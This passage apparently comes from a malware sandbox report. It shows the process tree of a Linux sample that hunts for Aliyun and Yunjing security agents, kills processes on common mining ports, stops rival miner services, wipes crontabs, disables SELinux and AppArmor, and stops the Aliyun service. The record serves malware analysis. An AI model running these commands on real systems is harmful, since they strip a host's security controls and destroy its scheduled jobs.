                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                grep -i "[a]liyun"
                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1735
                                                                                                                                                                                                                                                                                                                                                                                • /bin/ps
                                                                                                                                                                                                                                                                                                                                                                                  ps aux
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                  PID:1731
                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                  grep -i "[y]unjing"
                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1737
                                                                                                                                                                                                                                                                                                                                                                                  • /bin/ps
                                                                                                                                                                                                                                                                                                                                                                                    ps aux
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                    PID:1736
                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                                                                                                                                                                                                                    crontab -r
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1738
                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1744
                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                        grep -v -
                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1743
                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                          awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:1742
                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                            awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1741
                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                              grep :143
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1740
                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1750
                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                  grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1749
                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1748
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                      awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1747
                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                        grep :2222
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1746
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1756
                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                            grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1755
                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                              awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:1754
                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1753
                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                  grep :3333
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1752
                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1762
                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                      grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1761
                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                        awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1760
                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1759
                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                            grep :3389
                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1758
                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1768
                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1767
                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1766
                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1765
                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                      grep :4444
                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1764
                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1774
                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                          grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1773
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1772
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1771
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                              grep :5555
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1770
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1780
                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1779
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
2⤵
  PID:1778
• /usr/bin/awk
  awk "{print \$7}"
  2⤵
    PID:1777
  • /bin/grep
    grep :6666
    2⤵
      PID:1776
    • /usr/bin/xargs
      xargs -I "%" kill -9 "%"
      2⤵
        PID:1786
      • /bin/grep
        grep -v -
        2⤵
          PID:1785
        • /usr/bin/awk
          awk "-F[/]" "{print \$1}"
          2⤵
            PID:1784
          • /usr/bin/awk
            awk "{print \$7}"
            2⤵
              PID:1783
            • /bin/grep
              grep :6665
              2⤵
                PID:1782
              • /usr/bin/xargs
                xargs -I "%" kill -9 "%"
                2⤵
                  PID:1792
                • /bin/grep
                  grep -v -
                  2⤵
                    PID:1791
                  • /usr/bin/awk
                    awk "-F[/]" "{print \$1}"
                    2⤵
                      PID:1790
                    • /usr/bin/awk
                      awk "{print \$7}"
                      2⤵
                        PID:1789
                      • /bin/grep
                        grep :6667
                        2⤵
                          PID:1788
                        • /usr/bin/xargs
                          xargs -I "%" kill -9 "%"
                          2⤵
                            PID:1798
                          • /bin/grep
                            grep -v -
                            2⤵
                              PID:1797
                            • /usr/bin/awk
                              awk "-F[/]" "{print \$1}"
                              2⤵
                                PID:1796
                              • /usr/bin/awk
                                awk "{print \$7}"
                                2⤵
                                  PID:1795
                                • /bin/grep
                                  grep :7777
                                  2⤵
                                    PID:1794
                                  • /usr/bin/xargs
                                    xargs -I "%" kill -9 "%"
                                    2⤵
                                      PID:1804
                                    • /bin/grep
                                      grep -v -
                                      2⤵
                                        PID:1803
                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1802
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1801
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                grep :8444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1810
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1809
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1808
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1807
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          grep :3347
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1806
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1815
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1814
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1813
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    grep :14444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1822
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
  grep -v -
  2⤵
    PID:1821
• /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
    PID:1820
• /usr/bin/awk
  awk "{print \$7}"
  2⤵
    PID:1819
• /bin/grep
  grep :14433
  2⤵
    PID:1818
• /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
    PID:1828
• /bin/grep
  grep -v -
  2⤵
    PID:1827
• /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
    PID:1826
• /usr/bin/awk
  awk "{print \$7}"
  2⤵
    PID:1825
• /bin/grep
  grep :13531
  2⤵
    PID:1824
• /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
    PID:1834
• /bin/grep
  grep -v -
  2⤵
    PID:1833
• /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
    PID:1832
• /usr/bin/awk
  awk "{print \$7}"
  2⤵
    PID:1831
• /bin/grep
  grep :7890
  2⤵
    PID:1830
• /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
    PID:1840
• /bin/grep
  grep -v -
  2⤵
    PID:1839
• /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
    PID:1838
• /usr/bin/awk
  awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1837
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            grep :3456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              systemctl stop c3pool_miner.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1841
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl stop skypool_miner.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1845
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  systemctl disable c3pool_miner.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1846
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    systemctl disable skypool_miner.service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1850
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/killall
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      killall log_rot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        pkill -f log_rot
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1858
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/sbin/setenforce
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        setenforce 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Disables SELinux
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1859
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        service apparmor stop
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/basename
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            basename /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1861
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/basename
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              basename /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1862
  • /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    PID:1863
  • /bin/sed
    sed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"
    3⤵
    PID:1869
  • /bin/systemctl
    systemctl list-unit-files --full "--type=socket"
    3⤵
    PID:1868
• /usr/local/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  • Disables AppArmor
  PID:1860
• /usr/local/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  • Disables AppArmor
  PID:1860
• /usr/sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  • Disables AppArmor
  PID:1860
• /usr/bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  • Disables AppArmor
  PID:1860
• /sbin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  • Disables AppArmor
  PID:1860
• /bin/systemctl
  systemctl "--job-mode=ignore-dependencies" stop apparmor.service
  2⤵
  • Disables AppArmor
  PID:1860
• /bin/systemctl
  systemctl disable apparmor
  2⤵
  • Disables AppArmor
  PID:1873
  • /lib/systemd/systemd-sysv-install
    /lib/systemd/systemd-sysv-install disable apparmor
    3⤵
    PID:1877
    • /usr/bin/getopt
      getopt -o r: --long root: -- disable apparmor
      4⤵
      PID:1878
    • /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d apparmor defaults
      4⤵
      PID:1879
      • /usr/local/sbin/systemctl
        systemctl daemon-reload
        5⤵
        • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1880
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/sbin/update-rc.d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              /usr/sbin/update-rc.d apparmor disable
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Flushes firewall rules
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1881
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/local/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/local/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /sbin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/systemctl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                systemctl daemon-reload
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Disables AppArmor
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1885
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          service aliyun.service stop
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1889
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/basename
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              basename /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1893
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/basename
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                basename /usr/sbin/service
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1894
